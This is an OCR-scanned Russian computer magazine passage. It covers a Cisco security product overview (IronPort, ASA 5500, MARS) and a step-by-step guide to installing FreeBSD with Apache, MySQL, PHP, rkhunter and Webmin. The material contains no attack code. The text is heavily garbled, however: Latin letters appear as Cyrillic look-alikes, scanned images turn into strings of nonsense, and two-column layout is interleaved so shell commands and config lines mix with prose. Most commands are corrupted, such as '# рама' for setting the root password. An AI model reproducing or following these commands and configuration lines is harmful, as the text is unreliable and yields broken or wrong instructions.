Конечно же, разработка через тестирование не исключаеттести- 
рования приложения из цикла разработки, однако существенно 
облегчает как последующее тестирование, так и разработку в целом, 
позволяя избежать досадных ошибок, на исправление которых 
уходят многие часы. == 
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Ш Ш Сергей «дгтаег» Яремчук [9гтдег@{их. т.ча] 


Потрогаи ©С1$СО 


Популярные решения в области 


безопасности 


Защита информационных ресурсов является основной задачей любого системного администрато- 
ра. Реализовать ее можно при помощи сотни инструментов и технологий самого различного на- 
значения. Особую роль здесь занимают системы защиты сетевого трафика — блокирующие спам 
и доступ к неблагонадежным веб-ресурсам, УРМ; системы, блокирующие кражу персональных 
данных и прочие угрозы. По всеобщему признанию, лидирующее место в этом сегменте занимает 


продукция С15со, с которой мы и познакомимся. 


Семейство |гопРой! 


Корпорация С!$5со получила известность в первую очередь благо- 

даря разрабатываемому сетевому оборудованию, в частности — раз- 
личного рода многопротокольным маршрутизаторам, которыми онаи 
занималась на заре своего существования. В настоящее время список 
устройств самого различного назначения очень большой. Основную 
часть продукции среди них занимают решения, направленные наза- 
щиту периметра сети, удаленного доступа, аудита и дажеуправления 
доступом. Запутаться в предложении очень легко, особенноучитывая, 
что в каждой категории представлено несколько решений. 

Так как основной обмен и получение информации происходит по- 
средством электронной почты и веб-сервисов, их защите следует 
уделить особое внимание. Спам, вирусы, различного родаатаки — это 
только часть проблем, с которыми приходится сталкиваться сисадмину. 
Сегодня становятся популярными облачные сервисы, размещенные 
на площадке провайдера услуг. Если в случае корпоративного сервера 
защитные функции можно было возложить наединственнуюточку до- 
ступа — шлюз, то теперь мобильный пользователь, по сути, не привязан 
к корпоративной сети и может подключаться к 5аа$ напрямую. Такая не 
имеющая границ сетьтребует особого подхода для обеспечения безо- 
пасности мобильных пользователей, строгой аутентификации и огра- 
ничения доступа кприложениям. Сучетом действительных масштабов 
проблемы предложены и сотни решений различного рода эффектив- 
ности. Подразделение компании С1$со — С!5со гопРо Зу$етз (ЕС 
(гопроге. согп}, разрабатывающее программно-аппаратные комплексы, 
защищающие почтовые и веб-сервисы, предлагает эффективный 
вариант. Семейство [гопРог{ представлено несколькими сериями. Для 
защиты электронной почты предлагается Е-тпа{Фесигцу АррИапсе 
(состоит из двух серий С-5епез и Х-бепез, веб-трафика \\еБ 5есигку 
АррИапсе [(5-бепез]. Централизованное управление комплексом за- 
щиты из нескольких устройств осуществляется при помощи М-5епез. С 
его помощью администратор собирает журналы с несколькихустройств, 
формирует отчеты, распространяетединый файл настроек. М-Ъепез 
обеспечивает место для централизованного карантина, увеличивая 
пространство для хранения блокированных сообщений. В сетяхустрой- 
ства [гопРог{ чаще всего подключают в режиме прозрачного прокси. 
Это позволяет не менять настройки программ (браузеров, почтовых и 
ЕТР-клиентов). Трафикнатакой шлюз перенаправляется при помощи 
маршрутизатора, поддерживающего протокол М/ССРу2 (ММеь СасВе 
Согтипип!саНоп Ргофосо|). Хотя поддерживается и привычный «непро- 
зрачный» режим. Основу гопРог{ составляет операционная система 
Азупс05, являющаяся ЕгееВ50-оптимизированной для обработки 
большого числа соединений с преднастроенным окружением и своими 
программами. В итоге даже устройства нижнего уровня способны легко 
обработать до 10000 одновременных соединений, что практически 
исключает возможность ООЗ-атаки. Управление Азупс0$ осуществля- 


ется при помощи веб- или специализированного командного интер- 
фейса (Упих 5Ве( недоступен). Администратор может централизованно 
устанавливать настройки на нескольких устройствах, делегировать 
полномочия младших админов и пользователей, определяя при по- 
мощи политик доступ для групп к сервисам интернет (ЕТР, НТТР(5}}. 
Однако известность семейство |гопРог{ получило благодаря технологии 
репутационной фильтрации 5епзогВаее. К слову, ранее она называлась 
ЗепдегВазе и предназначалась исключительно для борьбы со спамом. 
Она и сейчас часто попадается в рекламных проспектах под этим 
именем, но направленность 5епзогВазе шире. Для определения надеж- 
ности узла здесь используется очень сложный механизм репутации 
КК Кайпо. Суть его проста. Сеть С1$со, по сути, является развернутой 
системой датчиков, насчитывающих сотни тысяч конечных устройств, 
контролирующих приблизительно 30% мирового трафика, широкий 
охвати продуманный алгоритм которых обеспечивает очень низкий 
уровень ошибок. Каждому!Р-адресу может быть присвоен рейтингот 
-10 до +10. На репутацию влияет большое количество факторов. Конеч- 
ный алгоритм разработчики не разглашают, но говорят, что в процессе 
обработки изучается более 200 параметров. Считается, что [Р-адресас 
низкой репутацией потенциально опасны, и весьтрафик с них [гопРог( 
автоматически блокирует. Администратор получит внятное сообщение, 
указывающее на причинутакой реакции [ппаМ\аге, фишинг, ит.п.}. Таким 
образом, применение репутации позволяет отклонить до 80% спама или 
запретить пользователю попасть на подозрительный веб-сайтеще на 
этапе соединения, экономя трафики ресурсы системы. Эта технология 
уже не раз показала свою эффективность. Так, например, ботнет-сеть 
\\а[едас была обнаружена и блокирована в самом начале активации, и 
компьютеры, защищенные [гопРоц, не попали подудар. Те, кто возился 
снастройками такого приложения, как 5ратАззаз!п, знает, кактяжело 
бывает подогнать его фильтры под конкретные требования. В гопРоп 
администратор просто указываетуровень Е!$К Кай под (стандартный, 
повышенный ит.п.}, все остальное происходитавтоматически, никакой 
подстройки не требуется. Как известно, втрадиционных блэклистах есть 
одна проблема: в них легко попасть, но из них нетак просто выйти :]. В 
отличие отних, в 5епзогВазе список формируется динамически. И если 
администратор удаленного ресурса решил проблему, и все признаки, 
понижающие рейтингисчезли, то и ЗепзогВазе автоматически под- 
ниметоценку [Р-адреса. 

Кроме этого, в [гопРог{ обеспечивается: 

® антиспам-фильтрация Апи-5рат Е[ег$ при помощи механизма САЗЕ 
(Сом{ех{Адари\е 5сапптд Епате, адаптивного контекстного сканиро- 
вания), распознающего даже картинки; 

» фильтрация на основе содержимого; 

® фильтрация веб-адресов (С15со |гопРогЕ УВЕ Е Щег<}, позволяющая 
контролировать правила пользования интернетом и предупреждать 
попытки обхода 80-го порта; 
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Чтобы научиться работать с С!5со, необходим доступ к 
оборудованию. Но цена на девайсы этой фирмы кусается. 

И хотя на том же еВау можно найти устройства ценой до 
$100 [маршрутизаторы], — это все начальный уровень и 
устаревшее оборудование. Те, что посовременней, потянут 
уже на пару тысяч, а то и больше. Замкнутый круг. Но выход 
есть! Для зарегистрированных преподавателей и студентов 
курсов С!5со предлагает программный эммулятор Раске{ 
Тгасег ( 

]}, задача которого — закрепить на практике 
полученные знания. При помощи РТ можно легко создавать 
целые виртуальные сети различной топологии и с различным 
количеством устройств. Для подключения предложены все 
основные типы оборудования выпускаемого С!5со (роутеры, 
свичи, точки доступа, УРМ и т.п.], подключившись к которым, 
можно менять настройки, моделировать обмен данными. 
Кроме этого «реализованы» все технологии и протоколы, 
используемые в оборудовании С!5со, поэтому настройка в КТ 
практически ничем не отличается от реального оборудования. 
Запустить РасКе{ Тгасег можно на \\Мп9о\м/з ХР-7 и некоторых 
дистрибутивах Чпих. 

Кроме ВТ популярны и другие эмуляторы — Пупагпрз | 
]} и СМ53 ( }. 


® двуслойная защита трафика отвирусов — проактивная (гопРог Мги$ 
ОшргеаК Е\ег<), блокирующая новые вирусы до появления сигнатур, и 
классическая (борпох, МсАНее)}; 

® шифрование почтового трафика междуустройствами [гопРом, про- 
верка сообщений при помощи цифровой подписи; 

® 0-Р-технологии, предотвращающие утечку конфиденциальных 
данных (сообщение сканируется на предмет наличия ключевых слов). 
Исходящие сообщения архивируются, что позволяет в будущем найти 
источникутечки данных. Контролируется почта, |М, 5Куре, веб-сайты. В 
случае нарушения админ получит предупреждение; 

® веб-прокси с кэшированием трафика; 


® просмотр и управление политиками веб-трафика на основе при- 


ложений [приложение вычисляется на основе УВ(, НТТР-заголовков 

и контента, в настоящее время [гопРог( «известны» все популярные 
программы). 

Контроль веб-трафика позволяетлегко обеспечить требования политик 
компании по целевому использованию интернета на рабочем месте. 
Для определенных групп легко можно перекрыть доступ к развлека- 
тельным ресурсам, файлообменным сетям, блокировать видеотрафик 

и прочее. При таком обилии возможностей настройки [гопРог{ через 
веб-интерфейс для подготовленного админа сложностей не составят. 
Устройства интегрируются с ГОАР-каталогами, втом числе исАсйуе 
Огескогу. При покупке гопРой нужно знать, что антиспам, антивируси 
проактивная защита лицензируются отдельно. Модули Керщайоп Е—Щег, 
ОЕР и отчетность предоставляются бесплатно и нетребуют продления 
лицензии. К слову, покупать девайс сегодня уже не обязательно. Кроме 
перечисленного выше, [гопРог{ предлагает облачные решения по 
обеспечению защиты корпоративной электронной почты. Реализован 
тридцатидневный тестовый доступ. Чтобы его запросить, следует за- 
полнить форму по адресу 
всем и не сразу. 


Серия АЗА 5500 


Одними из самых популярных продуктов, производимых компанией 
С15со, являются многофункциональные устройства С!5со АЗА 5500 
Зегес, используемые для защиты сетей всех масштабов [А$А — сокра- 
щение отАдарйуе бесигйу АррИапсез}, пришедшие на замену семейству 
РХ. Основная идея при создании АЗА 5500 была заложена в стратегии 
С!5со по созданию самозащищающейся сети 5ОМ (бе! ПВеепата 
Ме\могк$, }. Устройства АЗА 5500 являются, по сути, клю- 
чевым компонентом Адарйуе ГРгеа{ Оеепзе, так как способны решить 
все проблемы с безопасностью при относительно доступной цене. 

В результате в одной «железяке» интегрирован межсетевой экран, УРМ 
(споддержкой 55[ и|Рзес}, |Рб [система предотвращения вторжений), 
фильтр ЧК! и контроль доступа к интернет-сайтам, контроль контента 
плюс средства борьбы с вредоносными программами — антивирус, 
антиспам, антишпион, антифишинги АпН-Х [защита от неизвестных 
угроз}. То есть, практически, при помощи АА 5500 блокируются все 
опасности, которыми богат сегодняшний интернет. Этим и обусловлена 


‚ хотя по опыту — отвечают не 


популярность серии 5500. Межсетевой экран анализируеттрафикна 2-7 
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Настройка событий в интерфейсе управления С!5со 
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Для небольших организаций — С!5со АЗА 5505 


уровнях и безошибочно определяет приложения и протоколы, втом чис- 
ле!МиР?Р, голос и мультимедиа, СУБД и другие. Соответственно, админ 
легко может настроить использование того или иного видатрафика 

в организации. В том числе защитить отнецелевого использования 
разрешенных портов. Например, если в организации прикрыта аська, 
пользователь легко может обойти запрет, воспользовавшисьуслугами 
одной из служб, позволяющих подключаться к сервису по стандартным 
портам (в первую очередь 80). С АА 5500 такой номер не пройдет — он 
сразу обнаружит протокол на другом порту. В С15со 55 УРМ реализо- 
ваны функции С15со АпуСоппесеи С15со бесиге ОезКор (С$0]. Задачи 
С$0 — проверка состояния системы безопасности каждого компьютера, 
пытающегося подключиться к сети, и защита данных в ходе сессии. При 
подключении проверяется ряд параметров указанных администраторов 
— сертификат, ключ реестра, версия ОС, |Р-адрес, наличие кейлоггеров 
и других. При первом подключении к\/РМ на клиентский компьютер 
устанавливается клиент, доступ к ресурсам [АМ возможен через веб- 
браузер по разным протоколам [СПЕ$, НТТР/®, ЕТР). После соединения 
создается безопасная виртуальная машина, включающая шифрован- 
ный раздел. Ввод паролей и прочие операции осуществляются внутри 
\/М. После завершения работы все данные удаляются. 

За счетподдержки технологий Оо5, различных протоколов маршрутиза- 
ции, [Руб и других, АЗА 5500 легко встраиваются в существующую среду. 
Традиционно АЗА 5500 ставятся на входе сети, наличие нескольких 
интерфейсов дает возможность разделить сеть на несколько сегментов, 
выделив, например, ОМА. Прозрачный НгемиаЦ позволяетне менять 
топологию сети, при этом сам АЗА 5500 будет невидим для хакера. 
Учитывая, что финансовые возможности и потребности у каждой орга- 
низаций разные, серия представлена пятью устройствами [и шестью — в 
ег{егризе-уровне], поэтому легко выбрать действительно необходимое 
по функциональности, не переплатив. Для небольших и средних офисов 
предназначена самая младшая, восьмипортовая модель С15со АЗА 5505 
в двух вариантах — Вахе или 5есигцу Р\и$, которые обеспечивают соот- 


ЕВЫСО) Вы ЗО ВВС. аб РАТЕЛИЕ ЕСОИАИТРИ 
ВРЕТ 


——= ИЗ т ее п обыетиия 
- р г | Бат бр р 
№ РРИНИ й печи иене: № 


ви; рая Виз ==— = в [- и" Ш 
шт ыы а 
== . г: ыыы пали | Вы = 
Г В иж: ки паввия я Пе бы БЫ 
р МИ РА рЫ 
Е 24 Пе ы Зет | ВИ Г ия ВЕ а м 
але 
ие о 
и = Па В а О 
Е] м = 
Гора иены Бадене иай р-он Г 
ро Ба Баны Мады | 
ыы ранг ить т 


пен = с Е Ча а | ани № ба 


о р | м. Ри г. ы 


На еВау можно найти устройства С!5со по вполне при- 
емлемой цене 


ветственно 10000 или 25000 подключений, 10 или 25 соединений через 
2 сети УРМ, фильтрацию трафика и блокировку сетевых атак. К слову, на 
еВау можно найти б/у АБА 5505 даже за $150, что очень даже немного 
для подобного классаустройств. 

Старшие девайсы уже имеют встроенный антивирус, поддерживаютба 
лансировкуУРМ, проверку СТР/СРБ$ и прочее. Количество поддержи- 
ваемых \/Р№-сетей, которые можно использовать, например, для связи 
между офисами или подключения отдельных пользователей в АЗА 5520 
увеличено до 750. Относительно невысокая цена при наличии большого 


числа интегрированных функций делаетсерию 5500 весьма востребо- 
ванной. Конечно, никто не мешает купить сервер иустановить на него 
Орепбоигсе-компоненты (баша, НА\Р, башаСчага, ЦатА\, Ореп0РИ, 
Ореп\УРМ и многие другие}, но согласись, что правильно настроить все 
это хозяйство сможет далеко не каждый, да и подгонка параметров по- 
требует большего времени. Такой вариант подходит, когда мало средств, 
но есть время на доводку. Но в большинстве случаев оченьтяжело 
рассчитать максимальную нагрузку, которую выдержиттакой сервер. 

А что будем делать, когдаадмин возьмети уволится? Новому придется 
потратить прилично времени, чтобы разобраться с настройками, анайти 
хорошего спеца очень тяжело (Сергей превозносит С!5со и опускает 
опенсорс? Что-то произошло! — Прим. ред.). В случае применения 
многофункционального устройства С15со мы получаем все готовенькое с 
вполне понятными характеристиками и техподдержкой, которая крайне 
важна на первых этапах внедрения любого решения. Если фирмабы- 
стро развивается, то даже если и закупать маршрутизатор с некоторым 
запасом, его через какое-то времяуже может не хватить. Закупать новый 
накладно, ведь имеющийся еще не выработал полный ресурс. В случае 
сАЗА 5500 5епез [как, впрочем, ис другими сериями] базовые функции 
можно увеличить, просто купив новую лицензию и нарастив модули. Так, 
например, можно доустановить модуль адаптивной проверки и предот- 
вращения атак А!Р-55М (АдуапсеЧ |пзресНоп апа Ргеуепйоп 5есигиу 
бегмсез Модще) или С5С-55М (Сожегп( бесигйу ап Соп{го[ бесигйу 
бегмсез Модще]. Запаса по мощностиу девайсов С!5со обычно хватаетс 
головой, чтобы обеспечитьувеличившуюся нагрузку. 


С!5со МАЮ$ 


Одним из ключевых компонентов 50 М является система монито- 
ринга и реагирования С!5со МАР5 [Мопкоппд Апа(у<!5 апд Везропзе 
буфеп?]. Собирая данные с сетевых устройств (включая С!$со 
Ме Е (©\), они обеспечивают контроль их состояния и защиту. Воз- 
можен мониторинг приложений, производится анализ аномалий и 
поведения сетевых объектов, корреляция событий. Кроме собственно 
оборудования, С!5со поддерживает решения других вендоров — 155 
Реа(5есиге Ме\могк, МсАЕее пги5Ме/Е{егсерЕ НО5, Лип!рег ЮР, 
5пог{ и других. Широкий охват и алгоритмы анализа минимизируют 
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Бесплатный симулятор С!5со — С№ 3 


вероятность ошибки. В процессе опроса устройств выполняется 
анализ их конфигурации и производится запрос к базе данных 
уязвимостей (Чиа биага АМ\, Е-Еуе, Вейпа бсаппег Уи(пегаб Иу 

и С\Е]. Полученный ответ позволяет определить наличие проблем 

в конфигурации устройств и обнаружить потенциально уязвимые 
места в системе защиты. Предусмотрено протоколирование основных 
событий, что позволяет в последующем отследить действия хакера 

в масштабе сети или отдельного узла. Система представляет атаку 

в графической форме с подробным анализом, что позволяет быстро 
определить, через какие устройства осуществлялась атака. Это очень 
упрощает последующее расследование инцидента, а значит, и воз- 
можность более быстрой ответной реакции. 

Система предоставляет более 150 готовых отчетов. Оповещения отправ- 
ляются нае-та{, записываются в журнал, 5ММР. 

Устройство самостоятельно строит карту сети, обнаруживая маршрути- 
заторы, НгемиаЦ, 105ЛР5 ит.д. Система поставляется с целым набором 


предустановленных правил, администратор при помощи графического 
интерфейса может самостоятельно создавать новые правила, объеди- 
няя события с контекстом. 

В итоге, МАБ$ является эффективным средством мониторинга сетевой 
безопасности. К сожалению, С15со объявила об епд-о{-Ше этого про- 
дукта, сиюня 2011 года он будет постепенно исчезать из продажи. Срок 
окончания поддержки датирован концом июня 2015 года. Замены МАК$ 
не предложено, пользователям рекомендуется перейти на С!5со Зесигцу 
Мападег. 


Заключение 


Продукция С!5со окружена ореолом таинственности, и пока не стол- 
кнешься сней в реальности, создается впечатление, что это сложные в 
настройке устройства. На самом деле, любой пользователь, имевший 
ранее дело с*пхх, разберется с большинством функций буквально за 
пару дней. == 
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СПрБоага Шоскеа! 


СПИрБоага ШосКеа! 


Говоря об АрасПе, Му$СЕ и РНР, большинство админов имеют в виду стек ГАМР, подразумевающий 
установку этого набора софта в один из многочисленных дистрибутивов Ипих. Между тем выбор 
ГгееВ$О в этом случае может оказаться более подходящим. 


В этой статье я расскажу о всех шагах, которые необходимо выполнить 
для того, чтобы поднять ЕгееВ$О вместе со стеком (ЦАМР ине- 
сколькими инструментами администрирования на абсолютно голом 
сервере и сделатьтак, чтобы все это работало вместе без сбоеви 
непредвиденных ситуаций. 


Шаг]. Устанавливаем Егее В ЗО 


Для начала нам понадобится сама операционная система. Идем наофи- 
циальную страничку ЕгееВЗО [млллм.гееб$9.ога], жмем по ссылке «Се{ 
ЕгееВ5О Мо\м/», далее выбираем версию ОС [на момент написания ста- 
тьи доступны были две версии: 8.2-КЕГЕАЗЕи 7.4-ВЕГЕАФЕ), архитекту- 
ру [ат 964 или 1386}, нажимаем на ссылку [$50] и видим список доступных 
образов. Всего их пять: Бодфоп — загрузочный образ для установки по 
сети, 915$К1 — [50 образ для записи на СО, 9\91 — образ для записи на 
ОУО, уе — ИмеСО без графического интерфейса, пегпзйск для записи 
на У$В-брелок. В нашем случае подходящими будут только первый и 
второй, аесли в сети нет ОНСР-сервера, то только второй [0УО-образ 
качать смысла нет, потому как СО содержит все нам необходимое). 

Итак, скачиваем [5О0-образ, нарезаем его на болванку, вставляем в при- 
вод сервера и сбрасываем/включаем его. Ждем пока ОС загрузится. 
После окончания загрузки на экране должно появиться окно выбора 
страны и меню инсталлятора зузт${аЦ, состоящее из двенадцати 
пунктов. Нас интересует только один из них: «Ёхргез$», он позволяет 
установить операционную систему максимально быстро, пропустив 
многие предупреждающие сообщения, вопросы и настройки. Вы- 
бираем его, жмем <Ещег>. 

Появится окно программы для разбивки диска. Здесь можно либо 
просто нажать <А> для использования всего диска, либо <С>, чтобы 
создать новый раздел в свободной области. Однако, имей в виду, 

что ЕгееВЪЬ использует двухуровневую схему разметки диска при 
которой один стадартный ОО5-раздел (в терминологии ЕгееВЗО име- 
нуемый слайсом) может содержать в себе несколько В5О-разделов, 
поэтому на этом шаге понадобится создать только один раздел. По 
окончании нажимаем <>, чтобы выйти из программы. 

Следующее окно: вопрос об установке загрузчика, просто жмем 
<Ёщег> чтобы установить загрузчик в МВК. Сразу после него появится 
окно разметчика созданного ранее раздела на В50-разделы. Здесь 
можно поэкспериментировать, ноя бы рекомендовал просто нажать 
<А> чтобы программа сама разметила диск. Далее жмем <(>, чтобы 
подтвердить изменения. 

Следующее окно: выбор источника установки. По дефолту в качестве 
источника используется СО/О\УО, поэтому просто жмем <Еп{ег>. Под- 
тверждаем выбор нажатием <Ещег> в следующем окне. 

Теперь начнется процесс копирования файлов, по окончании кото- 
рого на экран будет выведено сообщение с вопросом о возвращении 
в главное меню инсталлятора. Нажимаем <Егцег>, далее <Х>, «\е5» 

и <Еег>. Операционная система должна перезагрузиться. Не за- 
бываем вынуть установочный диск из привода, чтобы ОС загрузилась 
с жесткого диска. 

По окончании загрузки вводим имя пользователя гос\{ и получаем до- 
ступ ккомандному интерпретатору. 


Шаг 2. Настройка 


Мы только что установили ЕгееВЪО, но онаеще не готова ктому, чтобы 
выполнять роль полноценного сервера: сеть не работает, гоо{ не име- 
етпароля, в системе только один пользователь. Исправим это. 
Перво-наперво, установим пользователю гос пароль: 


# рама 


Дважды вводим пароль. Далее создадим непривилегированного 
пользователя, учетную запись которого мы будем использовать 
для входа на сервер через 5$Н. Для этого воспользуемся командой 
аЧдизег: 


# аадизег 


На экране будут появляться вопросы, на большинство из которых 
можно не давать ответов (жать <Ег(ег>], важными являются только 
имя пользователя, дефолтовый командный интерпретатор [лучше 
выбрать {с$В]} и пароль. В конце команда выведет на экран получив- 
шийся список настроек пользователя, в ответ на который следует 
ввести слово «уез» (смотри скриншот}, и в ответ на следующий вопрос 
ввести «по». 

Чтобы пользователь смог получать права гос\*, добавим его в группу 
\мпее:: 


# ри =гоиртоа мПее]1 -т имя_пользователя 


Исправим файл /е{с/${аБ так, чтобы никто не смогзапускать файлы, 
расположенные на разделах /4гпр и /маг. Для этого добавим флаги 
«поехес» в поле ОрНоп$ каждого из этих разделов (смотри скриншот). 
Установим более жесткие ограничения на доступ к системным фай- 
лам: 


# сИтоа 90600 /ефс/зу$1о5.сопф 

# сто 0600 /ефс/гс. соп+ 

# сптоа 90600 /ефс/пемзу$1ов. соп+ 
# сИтоа 90600 /ефс/По$т$.а11ом 

# сптоа 0600 /ефс/1ов1п. соп 


Теперь нам нужно настроить сетевое соединение. Во ЕгееВЗО все 
глобальные настройки хранятся в файле /е{с/гс.сопф, поэтому откры- 
ваем его с помощью редактора и добавляем следующие строки: 


#ее /е{с/гс.соп# 

По5{пате="По${ . сот" 

1+сопЯ=_ет9="1пет 1.2.3.4 пефтазКк ФхЕЕЕЕЕЕ+" 
ефаи1{гоцфег="5.6.7.8" 


Здесь епп0 во второй строке — это имя настраиваемого сетевого 
интерфейса. Список всех доступных сетевых интерфейсов можно 
получить с помощью команды Исопйод. В качестве значения опции 
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можно указать ОНСР, тогда для конфигурирования интерфейса бу- # /ефс/гс.А/пеЕ1+ гееЖаг* 

дет использован АВсЦеп\. Также сразу добавим несколько важных 

для нас опций: Проверяем доступность сети: 
# ее /ефс/гс. соп+ # р1п& ехесЬб1ф .ги 


Добавим несколько полезных строк в файл /е\с/зу$с.сопЁ: 
1стр_Ч4гор_гед1гес*="УЕ$" 
1стр_10=5_геЧ41гес*="УЕ$" # ее /ефс/5у$с{1. соп 


1стр_бтса${есйо="МО" 

пе. 1пее.Еср.6]аскпо1е=2 
с1еаг_+тр_епаб1е="УЕ$" пее.1пее.иар.6]аскпо1е=1 
ирда*е_тофа="Мо" Кегп.рз_$5Пома11ргос$=0 

Защитим 55Н-сервер от брутфорс-атак: 

Еср_Чгор_зупЯп="У\УЕ$" # еспо "Мах5Фагфир$ 5:50:10" >> /ефс/55П/$5Па_сопй5 

# /ефс/гс.9/$$Па гезфФаг* 
5епата11 _епаб1е="МО" 
сепата11 _ибт1*_епаб1е=" М0" Теперь 55Н-сервер будет отбрасывать 50% новых подключений в 


случае, если будет произведено пять неправильных регистраций. 
Когда их станет десять, сервер перестанет отвечать вовсе. 


$5Иа_епаб1е="\УЕ$" При использовании экспресс-установки, система портов (фрейм- 
ворк для установки стороннего ПО в ОС] не устанавливается во 
Чтобы выйти из редактора, нажимаем <Е5с> и два раза <А>. ЕгееВУО автоматически, поэтому нам надо сделать это вручную 
Добавим адрес ОМ5-сервера в /ес/гезо(М. сопЁ: (это хорошо, потому что так мы получим самый свежий срез портов, 


не содержащий устаревшего дырявого ПО] 
#ее /е{с/гезо(\.соп! 


патезегуег 8.8.8.8 # рогЕ5пар Рефсй ехЕгас* 
Чтобы сетевые настройки вступили в силу, выполняем следующую Также можно обновить базовую систему, однако это делать не обяза- 
команду: тельно: 
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Запускаем конфигуратор \ММеблти 


# Ггееб5а-ирдате Кефсп 
# Ггееб5а-ирдате 1п${а11 
# эпиЕаомп -г пом 


После того как порты будут обновлены, установим в систему ин- 
струмент гкпитщег, нужный для отлова руткитов, которые могут быть 
установлены в систему в будущем: 


# са /чзг/рог*$ / зесиг1фу/гкпипфег 
# таКе 1п${а11 с1еап 


Отредактируем конфигурационный файл /изг/\осаУес/гКВип(ег. 
соп{ так, чтобы опция МАШ-ОМ-\\/АКМИМС содержала егпац, на 
который следует слать сообщения об обнаруженных аномалиях. 
Заставим инструмент проверить себя на обновления: 


# гкпиптег --ирда*е 


После этого создадим снимок системных файлов, который будет 
использоваться в качестве эталона во время поиска руткитов: 


# гкпиптег --ргорира 


Далее добавим в файл /е{с/ремос.соп{ две строки, благодаря 
которым проверки обновлений и системы будут происходить каждый 
день: 


# еспо 'Ча11у_гКВипфег_ирда*е_епаб1е="УЕ5"' > \ 
/ефс/рег1оа1с. соп+ 

# еспо 'Ча1]1у_гкпип%ег_спеск_епаб1е="\УЕ$"" > \ 
/ефс/регто@1с. соп+ 


Все, теперь все сообщения о подозрительной системной актив- 
ности будут помещаться в лог /маг/(од9/гкВит{ег. [09 и отсылаться на 
указанный в конфигурационном файлеетац. 

Далее настроим сгоп на синхронизацию системных часов каждые 
два часа: 
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| м м м м м шо а а а о о а о 


Ь 


ыыы ыыы ыыыыыыыыыы 


Го 
Пей 5 


зегоег ргоч14е ассезз 


То Кпоы 


фе 


5Сгтр* 


пит по1 апоафЛег 


ыер 


и 


Я т 
Я А = 


> Ч $1 %И ррог | | Е). 


# сгогкаь -е 


0@2*** гооф /и$г/10са1/$61п/пердаее роо1.пёр.огё 


Наконец, установим и \\ебгпит, ммеб-ориентированный интерфейс для 
удаленного управления сервером (те, кто предпочитает использовать 
для администрирования $5$Н, могут пропустить этот шаг}: 


# са /чзг/рогт$/зузи11$/мебт1п 
# таКе 1п${а11 с1еап 
# есбо 'мебт1п_епаб1е="УЕ$"" >> /ефс/гс. соп+ 


Далее необходимо запустить конфигуратор \\Мебтипт: 


# /и5г/10оса1/116/мебт1т/ зефир. И 


На вопросы можно отвечать нажатием <Еег>, однако когда дело 
дойдет до ввода пароля (строка «Годт ра$$\/ога:»], следует вве- 
сти пароль на доступ к \ММеб плит (лучше, если он будет отличаться от 
остальных паролей]. Далее можно запустить \Мебтит: 


# /изг/1оса1/еЕс/гс.Аа/мебт1т $ЕагЕ 


И протестировать его работу, введя адрес «ВИрз://Но<{.сот:10000/» в 
адресную строку ближайшего браузера. 


АМР 


Теперь настало время установить стек АМР, то есть — веб-сервер 
Арасрпе, базу данных Муз и интерпретатор РНР. Сначала займемся 
Араспе. Идем в порты и устанавливаем последнюю версию: 


# са /чзг/рогт$ /ммм/ араспе22 
# таКе сопй& 1п$%а11 с]еап 


На экране должно появиться окно конфигуратора, с помощью 
которого ты можешь выбрать установку опциональных компонентов 
сервера. Что-либо менять здесь смысла нет, поэтому можешь смело 
жать <Ещег>. После окончания сборки и установки не забудь добавить 
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ЕЕ а итигтти-Е. РАРИТЕТ 


Запрещаем запуск приложений с разделов /тр и /маг 


сервер в автозапуск (если поддержка 551 нетребуется, вторую строку 
можно пропустить]: 


# есПпо "'араспе22_епаб1е="\УЕ$"' >> /ефс/гс . соп 
# есро 'арасйе22$5]_епаб1е="УЕ$"" >> /ефс/гс. соп+ 


Также в конфигурационный файл следует добавить инструкцию для 
загрузки модуля ассГ_ПЁр, который будет буферизировать НТТР- 
соединения, что разгрузит сервер и поможет в борьбе с 5\М-флудом: 


# есро 'асс+_ Пр геаду="УЕ$"' >> /ефс/гс. соп+ 


# К1АТоаЧ асс+_ Пр 


Далее установим интерпретатор РНР пятой версии: 


# са /чзг/рогф$/1апё/рИрь 
# таке сопЯ& 1п$Фа11 с1еап 


Убедись, что опция «ВиЦа Арасйе поди» выбрана. 
Плюс несколько расширений кнему: 


# са /ч5г/рогт$/1ап/рИр5-ехфеп$10п$ 
# таке сопЯё 1п$Фа11 с1еап 


Важно, чтобы на шаге конфигурирования РНРты не забывал от- 
метить пункт «МуЗОЕ датабазе зирро{», принуждающий систему 
портов кустановке модуля РНР для работы с МуЗО(. Без него ничего 
не заработает. 

Теперь открываем конфигурационный файл АраспПе втекстовом 
редакторе (во ЕгееВЗ он запрятан далеко: /изг/(оса/ес/арасве22/ 
БИра.сопй и изменяем внем следующее: 

1. После строк ГоааМоаще добавляем следующие две строки: 


дааТуре арр11са*1оп/х-ПЕфра-рИр „рИр 
АЧаТуре арр11са{1оп/х-ПЕЕра-рИр-зоигсе „рИр$ 


2. Находим опцию 5егуегАдгтит и прописываем в качестве ее значе- 
ния свой почтовый адрес: 


5ег\уегАдт1п те@$1Тте. сот 


3. В опции Воситеп{Кос{указываем каталог, в котором будут хранить- 
ся все файлы нашего веб-сайта: 


БоситепЕВоо* " /Поте/мммм/ ааа" 


Не забываем создать этот каталог: 


+ шкатг /Поте/ммм 
+ шкатг /поте/ммм/ даа 
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Инсталлятор ЕгееВ$О сам разбивает раздел на подраз- 
делы 


# шкатг /поте/ммм/с51-61п 
Я предпочитаю использовать в качестве корневого каталога / 
Боппте/^^ллм/ так как, во-первых, каталог /Поте обычно находится на 
самом большом разделе (автоконфигуратор разделов, который мы 
использовали в ходе установки, отводит под /Воте большую часть 
пространства), а во-вторых, сним проще работать, чем с каким- 
нибудь /узг/(оса/\мл^мм/арасве22/да{а, запрятанным во множество 


подкаталогов. 
4. Находим следующую строку: 


<О1гесфогу /ч5г/1оса]1 /ммм/арасйе22 /дафа> 


И меняем ее так, чтобы в качестве каталога был указан 
Поситеп{Роо(: 


<О1гесфогу /поте/ммм/аата> 
5. Меняем следующие строки: 
<1+1Моди1е 41г_тоач1е> 


01гесфогуТпдех 1паех.Пт1 
</1+Моди1е> 


На эти: 
<11Моди1е 41г_ тоди1е> 
01гесфогуТпадех 1пдех.рИр 1падех.Ит1 
</1+1Моди1е> 
6. Внутри директивы <ИМоди(е а!аз_гподще> заменяем строку: 
5сг1реА11а$ /с51-61п/ "/и5г/1оса1 /ммм/араспе22/с51-Б1п/" 
Вотэтой: 
$сг1реА11а$ /сё1-61п/ "/Поте/ммм/ с51-Б1п/" 
7. Следующую строку: 
<91гесфогу "/и5г/1оса1 /имм/арасйе22/с51-61п" > 
Заменяем этой: 
